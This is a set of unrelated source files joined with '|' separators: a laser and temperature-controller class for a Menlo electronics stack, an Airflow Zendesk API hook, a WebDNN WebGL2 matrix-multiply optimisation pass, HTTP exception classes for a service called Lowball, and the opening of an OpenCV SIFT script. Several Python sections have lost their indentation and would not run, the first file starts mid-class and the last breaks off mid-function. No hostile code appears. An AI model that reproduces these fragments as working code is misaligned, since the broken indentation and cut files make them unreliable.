    :param switch_on: True for enabling integrator false for disabling it
    """
    if stage not in [1, 2]:
        LOGGER.error("Please provide integrator stage: 1 or 2. Given: %s",
                     stage)
        return
    if not isinstance(switch_on, bool):
        # BUGFIX: the message used to name a non-existent "is_instance"
        # parameter; the flag that must be boolean is `switch_on`.
        LOGGER.error("Provide boolean \"switch_on\" whether to switch "
                     "stage on. Given: %s", switch_on)
        return
    self._menlo.switch_integrator(LOCKBOX_ID, stage, switch_on)
def switch_ld(self, unit: LdDriver, switch_on: bool) -> None:
    """Switch the given laser diode driver on or off.

    :param unit: Which diode to act on (master oscillator or power amp).
    :param switch_on: True to enable the diode, False to disable it.
    :raises SubsystemError: Critical error in the oscillator supply unit.
    """
    try:
        if unit == LdDriver.MASTER_OSCILLATOR:
            if switch_on:
                self.laser.enable_mo()
            else:
                self.laser.disable_mo()
        elif unit == LdDriver.POWER_AMPLIFIER:
            if switch_on:
                self.laser.enable_pa()
            else:
                self.laser.disable_pa()
        else:
            LOGGER.error('Can only set current for either "mo" or "pa".')
    except ValueError:
        LOGGER.error("Couldn't switch LD")
        LOGGER.debug("Reason:", exc_info=True)
    except ecdl_mopa.CallbackError as err:
        LOGGER.error("Critical error in osc. sup. unit!")
        LOGGER.debug("Reason:", exc_info=True)
        # Chain the cause (was missing `from err`), matching set_current().
        raise SubsystemError("Critical error in osc. sup. unit!") from err
def switch_lock(self, switch_on: bool) -> None:
    """Engage or disengage the PII frequency lock electronics."""
    if not isinstance(switch_on, bool):
        LOGGER.error("Please provide boolean \"on\" argument when "
                     "switching pii lock electronics.")
        return
    self._menlo.switch_lock(LOCKBOX_ID, switch_on)
def switch_pii_ramp(self, switch_on: bool) -> None:
    """Enable or disable the lockbox's built-in ramp generator."""
    if not isinstance(switch_on, bool):
        LOGGER.error('Please provide boolean "on" argument when '
                     'switching pii ramp generation.')
        return
    self._menlo.switch_ramp(LOCKBOX_ID, switch_on)
def switch_tec(self, unit_name: str, switch_on: bool) -> None:
    """Switch the named TEC controller (e.g. 'miob') on or off.

    :param unit_name: A key of the legacy `TEC_CONTROLLERS` dict.
    :param switch_on: True to enable the controller, False to disable it.
    """
    if not self._is_tec_unit(unit_name):
        # _is_tec_unit() presumably reports the problem itself -- confirm.
        return
    if not isinstance(switch_on, bool):
        # BUGFIX: this case used to be a silent no-op; report it like the
        # other switch_* methods do.
        LOGGER.error('Please provide boolean "on" argument when '
                     'switching TEC controllers.')
        return
    self._menlo.switch_tec(TEC_CONTROLLERS[unit_name], switch_on)
def switch_tec_by_id(self, unit: TecUnit, switch_on: bool) -> None:
    """Like switch_tec(), but using the unit ID instead of name."""
    try:
        unit = TecUnit(unit)
    except (ValueError, TypeError):
        LOGGER.error("Invalid unit: %s.", unit)
        LOGGER.debug("Reason:", exc_info=True)
        # BUGFIX: bail out; the code used to fall through and call
        # switch_tec() with the invalid unit anyway.
        return
    if isinstance(switch_on, bool):
        self._menlo.switch_tec(unit, switch_on)
def switch_temp_ramp(self, unit: TecUnit, enable: bool) -> None:
"""Start or halt ramping the temperature setpoint."""
try:
unit = TecUnit(unit)
except (ValueError, TypeError):
LOGGER.error("TEC unit %s doesn't exist.", unit)
LOGGER.debug("Reason:", exc_info=True)
else:
if enable:
self._temp_ramps[unit].start_ramp()
else:
self._temp_ramps[unit].pause_ramp()
# Private Methods
def _ensure_menlo(self) -> None:
if not self._menlo:
raise ConnectionError("Menlo stack is not initialized yet.")
    def _init_laser(self) -> None:
        """Assemble the EcdlMopa laser controller from Menlo-stack callbacks.

        Wraps the stack's diode-current getters/setters and on/off switches
        into parameterless callbacks and hands them, together with the MiLas
        laser specification, to ecdl_mopa.EcdlMopa, which can then enforce
        the spec's operating limits on every call.
        """
        # Initalize a laser controller class using the methods that the menlo
        # stack current drivers expose.
        get_mo = partial(self._menlo.get_diode_current,
                         unit=_LD_CARDS[LdDriver.MASTER_OSCILLATOR])
        get_pa = partial(self._menlo.get_diode_current,
                         unit=_LD_CARDS[LdDriver.POWER_AMPLIFIER])
        set_mo = partial(self._menlo.set_current,
                         unit=_LD_CARDS[LdDriver.MASTER_OSCILLATOR])
        set_pa = partial(self._menlo.set_current,
                         unit=_LD_CARDS[LdDriver.POWER_AMPLIFIER])
        mo_on = partial(self.is_ld_enabled, LdDriver.MASTER_OSCILLATOR)
        pa_on = partial(self.is_ld_enabled, LdDriver.POWER_AMPLIFIER)
        # TODO: phase out use of legacy unit indexing
        mo_id = LdDriver.MASTER_OSCILLATOR  # Will be resolved to integers...
        pa_id = LdDriver.POWER_AMPLIFIER
        disable_mo = partial(self._menlo.switch_ld, switch_on=False, unit_number=mo_id)
        disable_pa = partial(self._menlo.switch_ld, switch_on=False, unit_number=pa_id)
        enable_mo = partial(self._menlo.switch_ld, switch_on=True, unit_number=mo_id)
        enable_pa = partial(self._menlo.switch_ld, switch_on=True, unit_number=pa_id)
        # Physical limits of the MiLas laser, taken from module constants.
        milas = ecdl_mopa.MopaSpec(
            mo_max=cs.MILAS_MO_MAX,
            mo_seed=cs.MILAS_MO_SEED,
            pa_max=cs.MILAS_PA_MAX,
            pa_transparency=cs.MILAS_PA_TRANSPARENCY,
            pa_backfire=cs.MILAS_PA_BACKFIRE)
        self.laser = ecdl_mopa.EcdlMopa(
            laser_specification=milas,
            # _unwrap_buffer may raise if there's no data yet, spoiling laser
            # operations.
            get_mo_callback=lambda: self._unwrap_buffer(get_mo()),
            get_pa_callback=lambda: self._unwrap_buffer(get_pa()),
            set_mo_callback=lambda c: set_mo(milliamps=c),
            set_pa_callback=lambda c: set_pa(milliamps=c),
            disable_mo_callback=disable_mo,
            disable_pa_callback=disable_pa,
            enable_mo_callback=enable_mo,
            enable_pa_callback=enable_pa,
            is_mo_enabled=mo_on,
            is_pa_enabled=pa_on)
    def _init_temp_ramps(self) -> None:
        """Initialize one TemperatureRamp instance for every TEC controller."""
        # TODO: Use functools.partials instead of default arguments to enforce
        # early binding.
        for name, unit in TEC_CONTROLLERS.items():
            # The "bound_unit=unit" default argument binds the *current* loop
            # value at definition time; a plain closure over "unit" would see
            # only the final loop value.
            def getter(bound_unit: int = unit) -> float:
                """Get the most recent temperature reading from MenloStack."""
                # We need to bind the loop variable "unit" to a local variable
                # here, e.g. using lambdas.
                temp_readings = self._menlo.get_temperature(bound_unit)
                if temp_readings:
                    return self._unwrap_buffer(temp_readings)
                raise ConnectionError("Couldn't determine temperature.")
            def setpt_getter(bound_unit: int = unit) -> float:
                """Gets the current TEC setpoint."""
                temp_setpts = self._menlo.get_temp_setpoint(bound_unit)
                if temp_setpts:
                    return self._unwrap_buffer(temp_setpts)
                raise ConnectionError("Couldn't determine temp. setpoint.")
            def setter(temp: float, bound_unit: int = unit) -> None:
                # Same here (see above).
                self._menlo.set_temp(bound_unit, temp)
            self._temp_ramps[unit] = TemperatureRamp(
                get_temp_callback=getter,
                get_temp_setpt_callback=setpt_getter,
                set_temp_callback=setter,
                name=name)
        # Set maximum allowable temperature gradients according to the
        # datasheets or educated guesses.
        # NOTE(review): presumably in kelvin per second (MIOB = 1 K/min,
        # others = 1 K per 5 s) -- confirm against TemperatureRamp's units.
        self._temp_ramps[TecUnit.MIOB].maximum_gradient = 1/60
        self._temp_ramps[TecUnit.VHBG].maximum_gradient = 1/5
        self._temp_ramps[TecUnit.SHGA].maximum_gradient = 1/5
        self._temp_ramps[TecUnit.SHGB].maximum_gradient = 1/5
def _is_tec_unit(self, name: str) -> bool:
if self._menlo is None:
return False
if name not in TEC_CONTROLLERS:
LOGGER.error('There is no TEC controller named "%s".', name)
return False
return True
@staticmethod
def _wrap_into_buffer(value: Union[MenloUnit, bool]) -> Buffer:
if isinstance(value, bool):
return [(time.time(), 1 if value else 0)] # bool is no MenloUnit
if isinstance(value, float):
return [(time.time(), float(value))] # float(): make mypy happy
if isinstance(value, int):
return [(time.time(), int(value))] # int(): make mypy happy
if value is None:
# Don't throw an error here, as None might just be an indication
# that there isn't any data available yet.
return []
LOGGER.error("Type %s is not convertible into a MenloUnit.",
type(value))
return []
@staticmethod
def _unwrap_buffer(buffer: Buffer) -> MenloUnit:
# Extract the latest reading from a buffer if possible. Raises!
try:
return buffer[0][1]
except IndexError as err:
raise ValueError("Buffer is empty!") from err
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
from typing import Optional
from zdesk import RateLimitError, Zendesk, ZendeskError
from airflow.hooks.base_hook import BaseHook
class ZendeskHook(BaseHook):
    """A hook to talk to Zendesk"""

    def __init__(self, zendesk_conn_id: str) -> None:
        super().__init__()
        self.__zendesk_conn_id = zendesk_conn_id
        self.__url = None  # set by get_conn(); used to strip pagination URLs

    def get_conn(self) -> Zendesk:
        """Create a Zendesk client from the configured Airflow connection."""
        conn = self.get_connection(self.__zendesk_conn_id)
        self.__url = "https://" + conn.host
        return Zendesk(
            # BUGFIX: "<PASSWORD>" was a redaction placeholder and not valid
            # Python; use the credential stored on the Airflow connection.
            zdesk_url=self.__url,
            zdesk_email=conn.login,
            zdesk_password=conn.password,
            zdesk_token=True,
        )

    def __handle_rate_limit_exception(self, rate_limit_exception: ZendeskError) -> None:
        """
        Sleep for the time specified in the exception. If not specified, wait
        for 60 seconds.
        """
        retry_after = int(rate_limit_exception.response.headers.get('Retry-After', 60))
        self.log.info("Hit Zendesk API rate limit. Pausing for %s seconds", retry_after)
        time.sleep(retry_after)

    def call(
        self,
        path: str,
        query: Optional[dict] = None,
        get_all_pages: bool = True,
        side_loading: bool = False,
    ) -> dict:
        """
        Call Zendesk API and return results

        :param path: The Zendesk API to call
        :param query: Query parameters
        :param get_all_pages: Accumulate results over all pages before
            returning. Due to strict rate limiting, this can often timeout.
            Waits for recommended period between tries after a timeout.
        :param side_loading: Retrieve related records as part of a single
            request. In order to enable side-loading, add an 'include'
            query parameter containing a comma-separated list of resources
            to load. For more information on side-loading see
            https://developer.zendesk.com/rest_api/docs/core/side_loading
        """
        query_params = query or {}
        zendesk = self.get_conn()
        # Retry the first request until it gets past rate limiting.
        first_request_successful = False
        while not first_request_successful:
            try:
                results = zendesk.call(path, query_params)
                first_request_successful = True
            except RateLimitError as rle:
                self.__handle_rate_limit_exception(rle)
        # Find the key with the results: e.g. "/api/v2/tickets.json" -> "tickets".
        keys = [path.split("/")[-1].split(".json")[0]]
        next_page = results['next_page']
        if side_loading:
            keys += query_params['include'].split(',')
        results = {key: results[key] for key in keys}
        # pylint: disable=too-many-nested-blocks
        if get_all_pages:
            while next_page is not None:
                try:
                    # Need to split because the next page URL has
                    # `github.zendesk...`
                    # in it, but the call function needs it removed.
                    next_url = next_page.split(self.__url)[1]
                    self.log.info("Calling %s", next_url)
                    more_res = zendesk.call(next_url)
                    for key in results:
                        results[key].extend(more_res[key])
                    if next_page == more_res['next_page']:
                        # Unfortunately zdesk doesn't always throw ZendeskError
                        # when we are done getting all the data. Sometimes the
                        # next just refers to the current set of results.
                        # Hence, need to deal with this special case
                        break
                    next_page = more_res['next_page']
                except RateLimitError as rle:
                    self.__handle_rate_limit_exception(rle)
                except ZendeskError as zde:
                    if b"Use a start_time older than 5 minutes" in zde.msg:
                        # We have pretty up to date data
                        break
                    raise zde
        return results
|
# Use RGBA channel in WebGL2
from typing import Dict, Iterable, List, Optional
import numpy as np
import onnx
from webdnn.optimization_pass_result_webgl import OptimizationPassResultWebGL
from webdnn.optimization_pass import OptimizationPass, OptimizationPassResult
from webdnn.onnx_util import tensor_proto_to_numpy, get_attr_int
from webdnn.operator_shader_webgl import OperatorShaderWebGL
SHADER_CODE = """import {
shaderGenHeader,
shaderGenOutput,
shaderGenTensorNDGetUniformItem,
shaderGenTensorOutputCoordsWithReturn,
shaderGenTensorOutputUniform,
shaderGenTensorOutputUniformItem,
} from "../../shaderHelper";
import {
WebDNNWebGLContext,
WebGLUniformItem,
} from "../../../../interface/backend/webgl/webglContext";
import { Tensor } from "../../../../interface/core/tensor";
import { WebGLTensor } from "../../../../interface/backend/webgl/webglTensor";
import { OperatorEntry } from "../../../../interface/core/operator";
import { calcStrides } from "../../../operatorUtil";
import { OperatorImpl } from "../../../operatorImpl";
// Version 13
class MatMulNT141 extends OperatorImpl {
constructor() {
super("webgl");
}
protected calcShapeNT141(
dimsA: ReadonlyArray<number>,
dimsB: ReadonlyArray<number>
) {
/*
*Matmulの出力shape、入力stride計算
*行列Bが転置状態かつ4chで入ってくる場合
*matmul((a,b,m,k), (a,b,n,k)) => (a,b,m,n)
*
*a, bの部分は2個に限らず0~無限個の次元がつけられる。
*2行列で各次元のサイズは一致が必要。
*broadcastingあり。次元数が少ない側には先頭にサイズ1の次元が付与。
*そのうえでサイズ1とそれ以外のサイズがある場合にそれ以外のサイズに合わせbroadcast
*
*一方の入力が1次元の場合の特例。
*(k), (a,b,n,k) => (a,b,n)
*(k)を(a,b,1,k)にbroadcastしたうえで計算して、(a,b,1,n)を得て、1の軸を消して(a,b,n)
*
*(a,b,m,k), (k) => (a,b,m)
*(k)を(a,b,1,k)にbroadcastしたうえで計算して、(a,b,m,1)を得て、1の軸を消して(a,b,m)
*
*両方1次元だと、単純な内積で(1,1)を得て1の軸2つが消え、0次元のスカラー値。
*/
// 出力の次元数(1次元の場合の特例適用前)
const totalNDims = Math.max(dimsA.length, dimsB.length, 2),
expandedDimsA = dimsA.slice();
if (expandedDimsA.length === 0) {
throw new Error();
} else if (expandedDimsA.length === 1) {
expandedDimsA.unshift(1);
}
while (expandedDimsA.length < totalNDims) {
expandedDimsA.unshift(1);
}
const expandedDimsB = dimsB.slice();
if (expandedDimsB.length === 0) {
throw new Error();
} else if (expandedDimsB.length === 1) {
expandedDimsB.unshift(1);
}
while (expandedDimsB.length < totalNDims) {
expandedDimsB.unshift(1);
}
const resultDims = [
expandedDimsA[expandedDimsA.length - 2],
expandedDimsB[expandedDimsB.length - 2],
],
innerProductLength = expandedDimsA[expandedDimsA.length - 1];
if (innerProductLength !== expandedDimsB[expandedDimsB.length - 1]) {
throw new Error();
}
const stridesA = calcStrides(expandedDimsA),
stridesB = calcStrides(expandedDimsB);
for (let i = expandedDimsA.length - 3; i >= 0; i--) {
const resultDim = Math.max(expandedDimsA[i], expandedDimsB[i]);
// Broadcastされた次元はstrideは0 (出力サイズ1の次元でも0にしてOK)
if (expandedDimsA[i] === 1) {
stridesA[i] = 0;
}
if (expandedDimsB[i] === 1) {
stridesB[i] = 0;
}
resultDims.unshift(resultDim);
}
// B is 4ch
for (let i = 0; i < stridesB.length; i++) {
stridesB[i] /= 4;
}
const resultDimsAfterSqueeze = resultDims.slice();
if (dimsA.length === 1) {
resultDimsAfterSqueeze.splice(resultDimsAfterSqueeze.length - 2, 1);
}
if (dimsB.length === 1) {
resultDimsAfterSqueeze.splice(resultDimsAfterSqueeze.length - 1, 1);
}
return {
resultDims,
resultDimsAfterSqueeze,
stridesA,
stridesB,
innerProductLength,
};
}
async run(context: WebDNNWebGLContext, inputs: Tensor[]): Promise<Tensor[]> {
context.assertsWebGLTensorArray(inputs);
const inputA = inputs[0],
inputB = inputs[1];
if (!context.webgl2) {
throw new Error("This operator can only run on WebGL2");
}
if (inputA.dataType !== "float32" || inputB.dataType !== "float32") {
throw new Error("only float32 is supported");
}
if (inputA.dimPerPixel !== 1 || inputB.dimPerPixel !== 4) {
throw new Error();
}
const {
resultDims,
resultDimsAfterSqueeze,
stridesA,
stridesB,
innerProductLength,
} = this.calcShapeNT141(inputA.dims, inputB.dims),
output = context.emptyTensor(resultDimsAfterSqueeze, "float32");
console.dir(this.calcShapeNT141(inputA.dims, inputB.dims));
if (resultDims.length === 2) {
await this.calcDim2(
context,
inputA,
inputB,
output,
resultDims,
stridesA,
stridesB,
innerProductLength
);
} else if (resultDims.length === 3) {
await this.calcDim3(
context,
inputA,
inputB,
output,
resultDims,
stridesA,
stridesB,
innerProductLength
);
} else {
// TODO: 4次元以上のサポート
throw new Error();
}
return [output];
}
private async calcDim2(
context: WebDNNWebGLContext,
dA: WebGLTensor,
dB: WebGLTensor,
dC: WebGLTensor,
resultDims: number[],
stridesA: ReadonlyArray<number>,
stridesB: ReadonlyArray<number>,
innerProductLength: number
) {
const kernelSource = `${shaderGenHeader(context.webgl2)}
#define innerProductLengthDiv4 ${innerProductLength / 4}
${shaderGenTensorOutputUniform(resultDims.length)}
uniform sampler2D tex_input_a;
uniform int tex_input_a_stride_0;
uniform int tex_input_a_stride_1;
ivec2 get_coord_a(int d0) {
int flat_index = d0 * tex_input_a_stride_0;
int texture_w = textureSize(tex_input_a, 0).x;
int y = flat_index / texture_w;
int x = flat_index - y * texture_w;
return ivec2(x, y);
}
uniform sampler2D tex_input_b;
uniform int tex_input_b_stride_0;
uniform int tex_input_b_stride_1;
ivec2 get_coord_b(int d0) {
int flat_index = d0 * tex_input_b_stride_0;
int texture_w = textureSize(tex_input_b, 0).x;
int y = flat_index / texture_w;
int x = flat_index - y * texture_w;
return ivec2(x, y);
}
void main() {
${shaderGenTensorOutputCoordsWithReturn(resultDims.length)}
float s = 0.0;
ivec2 c_a = get_coord_a(tex_output_0);
ivec2 c_b = get_coord_b(tex_output_1);
int texture_w_a = textureSize(tex_input_a, 0).x;
int texture_w_b = textureSize(tex_input_b, 0).x;
for (int ip = 0; ip < innerProductLengthDiv4; ip++) {
vec4 vec_a;
vec_a.r = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.g = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.b = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.a = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec4 vec_b = texelFetch(tex_input_b, c_b, 0);
s += dot(vec_a, vec_b);
c_b.x += 1;
if (c_b.x >= texture_w_b) {
c_b = ivec2(c_b.x - texture_w_b, c_b.y + 1);
}
}
${shaderGenOutput("s", context.webgl2)}
return;
}
`,
kernelName = `matmulnt141_2_${innerProductLength}`;
context.addKernel(kernelName, kernelSource);
const uniforms: WebGLUniformItem[] = [
...shaderGenTensorNDGetUniformItem(
"tex_input_a",
stridesA,
dA,
context.webgl2
),
...shaderGenTensorNDGetUniformItem(
"tex_input_b",
stridesB,
dB,
context.webgl2
),
...shaderGenTensorOutputUniformItem(resultDims, dC, context.webgl2),
];
await context.runKernel(
kernelName,
[
{ tensor: dA, name: "tex_input_a" },
{ tensor: dB, name: "tex_input_b" },
],
dC,
uniforms
);
}
private async calcDim3(
context: WebDNNWebGLContext,
dA: WebGLTensor,
dB: WebGLTensor,
dC: WebGLTensor,
resultDims: number[],
stridesA: ReadonlyArray<number>,
stridesB: ReadonlyArray<number>,
innerProductLength: number
) {
const kernelSource = `${shaderGenHeader(context.webgl2)}
#define innerProductLengthDiv4 ${innerProductLength / 4}
${shaderGenTensorOutputUniform(resultDims.length)}
uniform sampler2D tex_input_a;
uniform int tex_input_a_stride_0;
uniform int tex_input_a_stride_1;
uniform int tex_input_a_stride_2;
ivec2 get_coord_a(int d0, int d1) {
int flat_index = d0 * tex_input_a_stride_0 + d1 * tex_input_a_stride_1;
int texture_w = textureSize(tex_input_a, 0).x;
int y = flat_index / texture_w;
int x = flat_index - y * texture_w;
return ivec2(x, y);
}
uniform sampler2D tex_input_b;
uniform int tex_input_b_stride_0;
uniform int tex_input_b_stride_1;
uniform int tex_input_b_stride_2;
ivec2 get_coord_b(int d0, int d1) {
int flat_index = d0 * tex_input_b_stride_0 + d1 * tex_input_b_stride_1;
int texture_w = textureSize(tex_input_b, 0).x;
int y = flat_index / texture_w;
int x = flat_index - y * texture_w;
return ivec2(x, y);
}
void main() {
${shaderGenTensorOutputCoordsWithReturn(resultDims.length)}
float s = 0.0;
ivec2 c_a = get_coord_a(tex_output_0, tex_output_1);
ivec2 c_b = get_coord_b(tex_output_0, tex_output_2);
int texture_w_a = textureSize(tex_input_a, 0).x;
int texture_w_b = textureSize(tex_input_b, 0).x;
for (int ip = 0; ip < innerProductLengthDiv4; ip++) {
vec4 vec_a;
vec_a.r = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.g = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.b = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec_a.a = texelFetch(tex_input_a, c_a, 0).r;
c_a.x += 1;
if (c_a.x >= texture_w_a) {
c_a = ivec2(c_a.x - texture_w_a, c_a.y + 1);
}
vec4 vec_b = texelFetch(tex_input_b, c_b, 0);
s += dot(vec_a, vec_b);
c_b.x += 1;
if (c_b.x >= texture_w_b) {
c_b = ivec2(c_b.x - texture_w_b, c_b.y + 1);
}
}
${shaderGenOutput("s", context.webgl2)}
return;
}
`,
kernelName = `matmulnt141_3_${innerProductLength}`;
context.addKernel(kernelName, kernelSource);
if (stridesA[2] > dA.textureWidth || stridesB[2] > dB.textureWidth) {
throw new Error("MatMul: kernel assumption does not hold");
}
const uniforms: WebGLUniformItem[] = [
...shaderGenTensorNDGetUniformItem(
"tex_input_a",
stridesA,
dA,
context.webgl2
),
...shaderGenTensorNDGetUniformItem(
"tex_input_b",
stridesB,
dB,
context.webgl2
),
...shaderGenTensorOutputUniformItem(resultDims, dC, context.webgl2),
];
await context.runKernel(
kernelName,
[
{ tensor: dA, name: "tex_input_a" },
{ tensor: dB, name: "tex_input_b" },
],
dC,
uniforms
);
}
}
export function getOpEntries(): OperatorEntry[] {
return [
{
opType: "MatMulNT141",
backend: "webgl",
opsetMin: 1,
factory: () => new MatMulNT141(),
},
];
}
"""
class PassMatMulTransposeWebGL2(OptimizationPass):
    """Rewrite MatMul nodes whose RHS is a constant initializer into
    MatMulNT141 nodes that read the weight, transposed, from an RGBA
    (4 channels per pixel) WebGL2 texture."""

    def optimize(self, model: onnx.ModelProto) -> Optional[OptimizationPassResult]:
        """Return a pass result if any MatMul node was rewritten, else None."""
        graph = model.graph
        changed = False
        result = OptimizationPassResultWebGL()
        for node in graph.node:
            if node.op_type == "MatMul":
                rhs_name = node.input[1]
                initializers = graph.initializer
                optimizable = False
                rhs_array = None
                rhs_initializer = None
                for initializer in initializers:
                    if initializer.name == rhs_name:
                        rhs_array = tensor_proto_to_numpy(initializer)
                        rhs_array_shape = rhs_array.shape
                        # The shader packs 4 inner-product elements per texel,
                        # so the contraction axis (axis -2 of the RHS) must be
                        # a multiple of 4. NOTE: this "continue" advances the
                        # *initializer* loop; since names are unique the loop
                        # then finishes with optimizable == False and the node
                        # is skipped by the check below.
                        if len(rhs_array_shape) < 2 or rhs_array_shape[-2] % 4 != 0:
                            continue
                        optimizable = True
                        rhs_initializer = initializer
                        break
                if not optimizable:
                    continue
                # Drop the plain initializer; the transposed copy is re-added
                # through result.initializers below.
                initializers.remove(rhs_initializer)
                changed = True
                # optimize it to MatMulNT141
                node.op_type = "MatMulNT141"
                # add hint to use RGBA texture for weight
                result.tensor_move_options[rhs_name] = {"dimPerPixel": 4}
                # move inner-product axis to last
                transposed_rhs_array = np.moveaxis(rhs_array, -2, -1)
                result.initializers[rhs_name] = transposed_rhs_array
                result.operator_shaders["matmulnt141"] = OperatorShaderWebGL(SHADER_CODE)
                # TODO: check weight is not used by other operator
        return result if changed else None
|
from werkzeug.exceptions import HTTPException
class LowballException(HTTPException):
    """
    Base exception class for Lowball Exceptions
    """
    # Treat all exceptions as 500 unless explicitly overwritten
    code = 500
    # Handle Generic Exceptions
    description = "An Error Occurred. Please Check the Logs For Additional Data"
    # Since we are overwriting the base init class fulfilling the need of setting the response to None
    response = None

    def __init__(self, additional_log_data=None):
        """
        Initialize a Lowball Exception

        :param additional_log_data: additional data that can be placed in the logs but not shown to the user
        """
        # Set the optional Additional Log Data that is not shown to the user
        self.additional_log_data = additional_log_data
# Concrete Lowball exceptions. Each only overrides `code` (HTTP status) and
# `description` (user-facing message) from the LowballException base.
class InvalidTokenLifetimeException(LowballException):
    code = 400  # Bad Request
    description = "The Requested Lifetime for the Token Is Not In Range"
class NoAuthHeaderException(LowballException):
    code = 400  # Bad Request
    description = "No token provided with request"
class InvalidAuthHeaderException(LowballException):
    code = 400  # Bad Request
    description = "Authorization header improperly formatted"
class RequestNotJSONException(LowballException):
    code = 400  # Bad Request
    description = "Ill formatted request, the expected body was of type JSON"
class InvalidTokenException(LowballException):
    code = 401  # Unauthorized
    description = "Token Is Invalid"
class MalformedTokenIdException(LowballException):
    code = 400  # Bad Request
    description = "Invalid token id format"
class ExpiredTokenException(LowballException):
    code = 401  # Unauthorized
    description = "Token Has Expired"
class InadequateRolesException(LowballException):
    code = 401  # Unauthorized
    description = "Current Token Has Inadequate Roles for Requested Action"
class AuthenticationNotInitializedException(LowballException):
    code = 503  # Service Unavailable
    description = "No Authentication Provider Present"
class InvalidCredentialsException(LowballException):
    code = 401  # Unauthorized
    description = "Invalid credentials supplied"
class MalformedAuthPackageException(LowballException):
    code = 400  # Bad Request
    description = "The Authentication Request Did Not Supply The Required Data"
class MalformedProviderPackageException(LowballException):
    code = 400  # Bad Request
    description = "The Request Did Not Supply The Required Data for the Auth Provider"
class NoAuthenticationDatabaseException(LowballException):
    code = 503  # Service Unavailable
    description = "No authentication database configured for this application"
# The following inherit code=500 (Internal Server Error) from the base class.
class InvalidAuthDataException(LowballException):
    description = "Unable to create token. The authentication provider returned an unrecognized response."
class InvalidRequestingUserException(LowballException):
    description = "Attempted to create a token with an invalid requesting user"
class InvalidTokenLifeException(LowballException):
    description = "Attempted to create a token where expiration is greater than configured max token life"
class ListTokensInvalidReturnTypeException(LowballException):
    description = "auth_db.list_tokens did not return a list as expected"
class ListClientsInvalidReturnTypeException(LowballException):
    description = "auth_provider.list_clients did not return a list of client data objects as expected"
class ListTokensInvalidTokenInListException(LowballException):
    description = "auth_db.list_tokens returned a list that included a non-Token object"
class TokenNotFoundException(LowballException):
    code = 404  # Not Found
    description = "Specified token not found"
# Exceptions whose description is supplied per-raise instead of being fixed
# on the class.
class BadRequestException(LowballException):
    """400 error carrying a caller-supplied description."""
    code = 400

    def __init__(self, description, additional_log_data=None):
        super().__init__(additional_log_data)
        self.description = description


class InternalServerErrorException(LowballException):
    """500 error carrying a caller-supplied description."""
    code = 500

    def __init__(self, description, additional_log_data=None):
        super().__init__(additional_log_data)
        self.description = description


class NotFoundException(LowballException):
    """404 error carrying a caller-supplied description."""
    code = 404

    def __init__(self, description, additional_log_data=None):
        super().__init__(additional_log_data)
        self.description = description


class NotImplementedException(LowballException):
    """501 error naming the unimplemented function."""
    code = 501

    def __init__(self, function, additional_log_data=None):
        super().__init__(additional_log_data)
        self.description = f"{function} not implemented"
# BUGFIX: InvalidTokenException appeared twice in this list; the duplicate
# entry was removed. NOTE(review): the list is still not exhaustive (e.g.
# TokenNotFoundException is absent) -- confirm whether that is intentional.
LOWBALL_EXCEPTIONS = [
    LowballException,
    InvalidTokenException,
    NoAuthHeaderException,
    InvalidAuthHeaderException,
    RequestNotJSONException,
    ExpiredTokenException,
    InadequateRolesException,
    AuthenticationNotInitializedException,
    InvalidCredentialsException,
    MalformedAuthPackageException,
    NoAuthenticationDatabaseException,
    MalformedProviderPackageException,
    MalformedTokenIdException,
    ListClientsInvalidReturnTypeException
]
# Public API of this module: every exception class plus the registration list.
__all__ = [
    "LowballException",
    "InvalidTokenLifetimeException",
    "NoAuthHeaderException",
    "InvalidAuthHeaderException",
    "RequestNotJSONException",
    "InvalidTokenException",
    "ExpiredTokenException",
    "InadequateRolesException",
    "AuthenticationNotInitializedException",
    "InvalidCredentialsException",
    "MalformedAuthPackageException",
    "NoAuthenticationDatabaseException",
    "LOWBALL_EXCEPTIONS",
    "InvalidAuthDataException",
    "InvalidRequestingUserException",
    "InvalidTokenLifeException",
    "ListTokensInvalidTokenInListException",
    "ListTokensInvalidReturnTypeException",
    "TokenNotFoundException",
    "BadRequestException",
    "InternalServerErrorException",
    "NotFoundException",
    "NotImplementedException",
    "MalformedProviderPackageException",
    "MalformedTokenIdException",
    "ListClientsInvalidReturnTypeException"
]
|
# <gh_stars>1-10  (repository-dump artifact; commented out -- was a syntax error)
import sys
if '/opt/ros/kinetic/lib/python2.7/dist-packages' in sys.path:
sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
import cv2 as cv
import cv2
import imutils
import numpy as np
def detectAndDescribe(image):
    """Detect SIFT keypoints in `image` and compute their descriptors.

    :param image: BGR input image (as loaded by cv2.imread).
    :returns: tuple (kps, features) where kps is an (N, 2) float32 array of
        keypoint coordinates and features is the SIFT descriptor matrix.
    """
    # convert the image to grayscale
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
